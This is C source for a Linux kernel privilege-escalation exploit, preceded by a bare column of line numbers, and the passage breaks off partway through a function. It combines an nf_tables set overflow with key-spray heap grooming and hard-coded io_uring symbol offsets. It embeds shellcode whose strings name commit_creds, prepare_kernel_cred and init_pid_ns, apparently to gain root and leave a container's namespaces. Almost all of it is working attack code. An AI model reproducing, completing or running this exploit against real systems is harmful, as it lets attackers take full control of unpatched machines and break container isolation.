310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <linux/keyctl.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <sys/types.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <semaphore.h>
#include <sched.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>
#include <linux/netlink.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include "kernelpwn.h"
#define ID 1337
#define SET_NAME "nameXXX"
#define LEAK_SET_NAME "leakXXX"
#define TABLE_NAME "tableXX"

#define IO_RING_CTX_REF_FREE_OFFSET 0xc4235d // ????????? ffffffff81c4235d t io_ring_ctx_ref_free
#define IO_RSRC_NODE_REF_ZERO_OFFSET 0xc42517 // ????????? ffffffff81c42517 t io_rsrc_node_ref_zero

// spray in kmalloc-64
#define KEY_DESC_MAX_SIZE 40
#define KEY_PAYLOAD_SIZE (32 + 1 - 24)
#define PREFIX_BUF_LEN (16)
#define RCU_HEAD_LEN (16)
#define SPRAY_KEY_CNT (150)

#define FREE_HOLE_BEGIN (100)
#define FREE_HOLE_STEP (10)

#define CORRUPT_SIZE (0x8000)

#define PHYSMAP_MASK 0xffffffff00000000

#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16)

#define PAGE_SIZE 0x1000

struct leak_payload {
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
uint16_t len;
} __attribute__((packed));

struct write_payload {
uint8_t prefix[PREFIX_BUF_LEN];
char *pg_vec;
char *pg_vec2; // in case shellcode is too long
} __attribute__((packed));

typedef int32_t key_serial_t;

void spray_keyring(key_serial_t *id_buffer, uint32_t spray_size) {
char key_desc[0x20];
char key_payload[KEY_PAYLOAD_SIZE + 1] = {0};

for (uint32_t i = 0; i < spray_size; i++) {
snprintf(key_desc, sizeof(key_desc), "spray_key_%d", i);
memset(key_payload, 'A', KEY_PAYLOAD_SIZE);
for (int j = 0; j < 3; j++) {
// retry, after KEYCTL_REVOKE, the key is scheduled for garbage collection,
// so it is not freed immediately
id_buffer[i] = key_alloc(key_desc, key_payload, 0x20);
if (id_buffer[i] < 0) {
usleep(100 * 1000); // 100ms
} else {
break;
}
}

if (id_buffer[i] < 0) {
err_exit("add_key");
}
}
}

uint8_t shellcode[] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,

0x48, 0x8d, 0x3d, 0x00, 0x10, 0x00, 0x00, 0xeb, 0x00, 0x55, 0x41, 0x57,
0x41, 0x56, 0x41, 0x54, 0x53, 0x49, 0x89, 0xfc, 0x48, 0x8d, 0x35, 0xfd,
0x01, 0x00, 0x00, 0x6a, 0x0d, 0x5a, 0xe8, 0x85, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x71, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x48,
0x8d, 0x35, 0xef, 0x01, 0x00, 0x00, 0x6a, 0x14, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x67, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x53, 0x01,
0x00, 0x00, 0x48, 0x63, 0x2b, 0x48, 0x01, 0xdd, 0x48, 0x63, 0x08, 0x48,
0x01, 0xc1, 0x31, 0xff, 0xff, 0xd1, 0x48, 0x89, 0xc7, 0xff, 0xd5, 0x48,
0x8d, 0x35, 0xd3, 0x01, 0x00, 0x00, 0x6a, 0x0a, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x37, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x23, 0x01,
0x00, 0x00, 0x48, 0x89, 0xc3, 0x48, 0x8d, 0x35, 0xbf, 0x01, 0x00, 0x00,
0x6a, 0x09, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0x19, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x05, 0x01, 0x00, 0x00, 0x48, 0x63, 0x0b, 0x48,
0x01, 0xd9, 0x48, 0x63, 0x18, 0x48, 0x01, 0xc3, 0x6a, 0x01, 0x5f, 0xff,
0xd1, 0x48, 0x89, 0xc7, 0x31, 0xf6, 0xff, 0xd3, 0x49, 0x89, 0xc6, 0x48,
0x8d, 0x35, 0x92, 0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0xe3, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xcf, 0x00,
0x00, 0x00, 0x49, 0x89, 0xc7, 0x48, 0x63, 0x18, 0x48, 0x8d, 0x35, 0x7d,
0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0xc2, 0x00,
0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00, 0x00, 0x00, 0x49,
0x01, 0xdf, 0x49, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0,
0x4c, 0x63, 0x10, 0x49, 0x01, 0xc2, 0x49, 0x8d, 0x8f, 0xa0, 0x00, 0x00,
0x00, 0x4c, 0x89, 0xfa, 0x48, 0x39, 0xca, 0x0f, 0x83, 0x88, 0x00, 0x00,
0x00, 0x48, 0x8b, 0x02, 0x4c, 0x39, 0xc0, 0x73, 0x06, 0x48, 0x83, 0xc2,
0x08, 0xeb, 0xe9, 0x48, 0x8d, 0xb0, 0x00, 0x30, 0x00, 0x00, 0x48, 0x89,
0xc7, 0x48, 0x39, 0xf7, 0x73, 0xeb, 0x48, 0x39, 0x07, 0x48, 0x8d, 0x7f,
0x08, 0x75, 0xf2, 0x48, 0x85, 0xc0, 0x74, 0x5d, 0x6a, 0x01, 0x41, 0x5c,
0x49, 0x89, 0xc3, 0x49, 0x39, 0xf3, 0x73, 0x51, 0x4d, 0x8b, 0x0b, 0x4d,
0x39, 0xc1, 0x72, 0x34, 0x4c, 0x39, 0xc8, 0x74, 0x2f, 0x49, 0x8d, 0x49,
0x60, 0x31, 0xd2, 0x31, 0xdb, 0x4c, 0x89, 0xcf, 0x48, 0x39, 0xcf, 0x73,
0x1f, 0x48, 0x8b, 0x2f, 0x4c, 0x39, 0xfd, 0x41, 0x0f, 0x44, 0xd4, 0x4c,
0x39, 0xd5, 0x41, 0x0f, 0x44, 0xdc, 0x48, 0x83, 0xc7, 0x08, 0x85, 0xdb,
0x74, 0xe2, 0x85, 0xd2, 0x74, 0xde, 0xeb, 0x06, 0x49, 0x83, 0xc3, 0x08,
0xeb, 0xb9, 0x4d, 0x85, 0xc9, 0x74, 0x0a, 0x4c, 0x89, 0xc9, 0x48, 0x29,
0xc1, 0x4d, 0x89, 0x0c, 0x0e, 0x31, 0xc0, 0x5b, 0x41, 0x5c, 0x41, 0x5e,
0x41, 0x5f, 0x5d, 0xc3, 0x53, 0x49, 0x89, 0xd0, 0x49, 0xf7, 0xd8, 0x41,
0xb9, 0x00, 0x00, 0x00, 0x02, 0x31, 0xc0, 0x49, 0x89, 0xfb, 0x4e, 0x8d,
0x14, 0x07, 0x4d, 0x01, 0xca, 0x4d, 0x39, 0xd3, 0x77, 0x50, 0x31, 0xc9,
0x48, 0x39, 0xca, 0x74, 0x13, 0x41, 0x8a, 0x1c, 0x0b, 0x3a, 0x1c, 0x0e,
0x75, 0x05, 0x48, 0xff, 0xc1, 0xeb, 0xed, 0x49, 0xff, 0xc3, 0xeb, 0xe1,
0x4d, 0x85, 0xdb, 0x74, 0x31, 0x49, 0x01, 0xf9, 0x48, 0x83, 0xe7, 0xfc,
0x4c, 0x39, 0xcf, 0x73, 0x13, 0x8b, 0x0f, 0x4c, 0x89, 0xdb, 0x48, 0x29,
0xcb, 0x48, 0x39, 0xfb, 0x74, 0x11, 0x48, 0x83, 0xc7, 0x04, 0xeb, 0xe8,
0x49, 0x01, 0xd3, 0x4d, 0x29, 0xd9, 0x4c, 0x89, 0xdf, 0xeb, 0xab, 0x48,
0x83, 0xc7, 0xfc, 0x48, 0x89, 0xf8, 0x5b, 0xc3, 0x63, 0x6f, 0x6d, 0x6d,
0x69, 0x74, 0x5f, 0x63, 0x72, 0x65, 0x64, 0x73, 0x00, 0x70, 0x72, 0x65,
0x70, 0x61, 0x72, 0x65, 0x5f, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x5f,
0x63, 0x72, 0x65, 0x64, 0x00, 0x66, 0x69, 0x6e, 0x64, 0x5f, 0x76, 0x70,
0x69, 0x64, 0x00, 0x70, 0x69, 0x64, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x70, 0x69, 0x64, 0x5f, 0x6e, 0x73, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x75, 0x74, 0x73, 0x5f, 0x6e, 0x73, 0x00};

// ---------------------------------- netlink --------------------------------------
// Netlink messages
#define NETLINK_RECEIVE_BUFFER_SIZE 4096

// Netlink attributes
#define U32_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint32_t))
#define U64_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint64_t))
#define S8_NLA_SIZE (sizeof(struct nlattr) + 8)
#define NLA_BIN_SIZE(x) (sizeof(struct nlattr) + x)
#define NLA_ATTR(attr) ((void *)attr + NLA_HDRLEN)
#define TABLEMSG_SIZE NLMSG_SPACE(sizeof(struct nfgenmsg) + S8_NLA_SIZE)

// get_batch_begin_nlmsg(): Construct a BATCH_BEGIN message for the netfilter netlink
struct nlmsghdr *get_batch_begin_nlmsg(void) {
struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
struct nfgenmsg *nfgm = (struct nfgenmsg *)NLMSG_DATA(nlh);
if (!nlh)
err_exit("malloc");

memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
nlh->nlmsg_seq = 0;

// Used to access to the netfilter tables subsystem
nfgm->res_id = NFNL_SUBSYS_NFTABLES;

return nlh;
}

// get_batch_end_nlmsg(): Construct a BATCH_END message for the netfilter netlink
struct nlmsghdr *get_batch_end_nlmsg(void) {
struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
if (!nlh)
err_exit("malloc");

memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
nlh->nlmsg_type = NFNL_MSG_BATCH_END;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = NLM_F_REQUEST;
nlh->nlmsg_seq = 0;

return nlh;
}

// set_nested_attr(): Prepare a nested netlink attribute
struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, uint16_t data_len) {
attr->nla_type = type;
attr->nla_len = NLA_ALIGN(data_len + sizeof(struct nlattr));
return (void *)attr + sizeof(struct nlattr);
}

// set_u32_attr(): Prepare an integer netlink attribute
struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t value) {
attr->nla_type = type;
attr->nla_len = U32_NLA_SIZE;
*(uint32_t *)NLA_ATTR(attr) = htonl(value);

return (void *)attr + U32_NLA_SIZE;
}

// set_u64_attr(): Prepare a 64 bits integer netlink attribute
struct nlattr *set_u64_attr(struct nlattr *attr, uint16_t type, uint64_t value) {
attr->nla_type = type;
attr->nla_len = U64_NLA_SIZE;
*(uint64_t *)NLA_ATTR(attr) = htobe64(value);

return (void *)attr + U64_NLA_SIZE;
}

// set_str8_attr(): Prepare a 8 bytes long string netlink attribute
// @name: Buffer to copy into the attribute
struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const char name[8]) {
attr->nla_type = type;
attr->nla_len = S8_NLA_SIZE;
memcpy(NLA_ATTR(attr), name, 8);

return (void *)attr + S8_NLA_SIZE;
}

// set_binary_attr(): Prepare a byte array netlink attribute
// @buffer: Buffer with data to send
// @buffer_size: Size of the previous buffer
struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, uint8_t *buffer, uint64_t buffer_size) {
attr->nla_type = type;
attr->nla_len = NLA_BIN_SIZE(buffer_size);
memcpy(NLA_ATTR(attr), buffer, buffer_size);

return (void *)attr + NLA_ALIGN(NLA_BIN_SIZE(buffer_size));
}

// ---------------------------------- nf_tables --------------------------------------
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16) // Max size - elemsize - sizeof(nft_set_ext)(align) - min datasize

const uint8_t zerobuf[0x40] = {0};

// create_table(): Register a new table for the inet family
void create_table(int sock, const char *name) {
struct msghdr msg;
struct sockaddr_nl dest_snl;
struct iovec iov[3];
struct nlmsghdr *nlh_batch_begin;
struct nlmsghdr *nlh;
struct nlmsghdr *nlh_batch_end;
struct nlattr *attr;
struct nfgenmsg *nfm;

// Destination preparation
memset(&dest_snl, 0, sizeof(dest_snl));
dest_snl.nl_family = AF_NETLINK;
memset(&msg, 0, sizeof(msg));

// 1. Netlink batch_begin message preparation
nlh_batch_begin = get_batch_begin_nlmsg();

// 2. Netlink table message preparation
nlh = (struct nlmsghdr *)malloc(TABLEMSG_SIZE);
if (!nlh)
err_exit("malloc");

memset(nlh, 0, TABLEMSG_SIZE);
nlh->nlmsg_len = TABLEMSG_SIZE;
nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = NLM_F_REQUEST;
nlh->nlmsg_seq = 0;

nfm = NLMSG_DATA(nlh);
nfm->nfgen_family = NFPROTO_INET;

// Prepare associated attribute
attr = (void *)nlh + NLMSG_SPACE(sizeof(struct nfgenmsg));
set_str8_attr(attr, NFTA_TABLE_NAME, name);

// 3. Netlink batch_end message preparation
nlh_batch_end = get_batch_end_nlmsg();

// IOV preparation
memset(iov, 0, sizeof(struct iovec) * 3);
iov[0].iov_base = (void *)nlh_batch_begin;
iov[0].iov_len = nlh_batch_begin->nlmsg_len;
iov[1].iov_base = (void *)nlh;
iov[1].iov_len = nlh->nlmsg_len;
iov[2].iov_base = (void *)nlh_batch_end;
iov[2].iov_len = nlh_batch_end->nlmsg_len;

// Message header preparation
msg.msg_name = (void *)&dest_snl;
msg.msg_namelen = sizeof(struct sockaddr_nl);
msg.msg_iov = iov;
msg.msg_iovlen = 3;

sendmsg(sock, &msg, 0);

// Free used structures
free(nlh_batch_end);
free(nlh);
free(nlh_batch_begin);
}

/* create_set(): Create a netfilter set
* @sock: Socket used to communicate throught the netfilter netlink
* @set_name: Name of the created set
* @set_keylen: Length of the keys of this set. Used in the exploit to control the used cache
* @data_len: Length of stored data. Used to control the size of the overflow
* @table_name: Name of the table that stores this set
* @id: ID of the created set */
void create_set(int sock, const char *set_name, uint32_t set_keylen, uint32_t data_len, const char *table_name, uint32_t id) {
struct msghdr msg;
struct sockaddr_nl dest_snl;
struct nlmsghdr *nlh_batch_begin;
struct nlmsghdr *nlh_payload;
struct nlmsghdr *nlh_batch_end;
struct nfgenmsg *nfm;
struct nlattr *attr;
uint64_t nlh_payload_size;
struct iovec iov[3];

// Prepare the netlink sockaddr for msg
memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
dest_snl.nl_family = AF_NETLINK;

// 1. First netlink message: batch_begin */
nlh_batch_begin = get_batch_begin_nlmsg();

// 2. Second netlink message : Set attributes */
nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_TABLE
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_NAME
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_ID
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_KEY_LEN
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_FLAGS
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_DATA_TYPE
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_DATA_LEN
nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

// Allocation
nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
if (!nlh_payload)
err_exit("malloc");

memset(nlh_payload, 0, nlh_payload_size);

// Fill the required fields
nlh_payload->nlmsg_len = nlh_payload_size;
nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET;
nlh_payload->nlmsg_pid = getpid();
nlh_payload->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
nlh_payload->nlmsg_seq = 0;

// Setup the nfgenmsg
nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
nfm->nfgen_family = NFPROTO_INET;

// Setup the attributes
attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
attr = set_str8_attr(attr, NFTA_SET_TABLE, table_name);
attr = set_str8_attr(attr, NFTA_SET_NAME, set_name);
attr = set_u32_attr(attr, NFTA_SET_ID, id);
attr = set_u32_attr(attr, NFTA_SET_KEY_LEN, set_keylen);
attr = set_u32_attr(attr, NFTA_SET_FLAGS, NFT_SET_MAP);
attr = set_u32_attr(attr, NFTA_SET_DATA_TYPE, 0);
set_u32_attr(attr, NFTA_SET_DATA_LEN, data_len);

// 3. Last netlink message: batch_end
nlh_batch_end = get_batch_end_nlmsg();

// Setup the iovec
memset(iov, 0, sizeof(struct iovec) * 3);
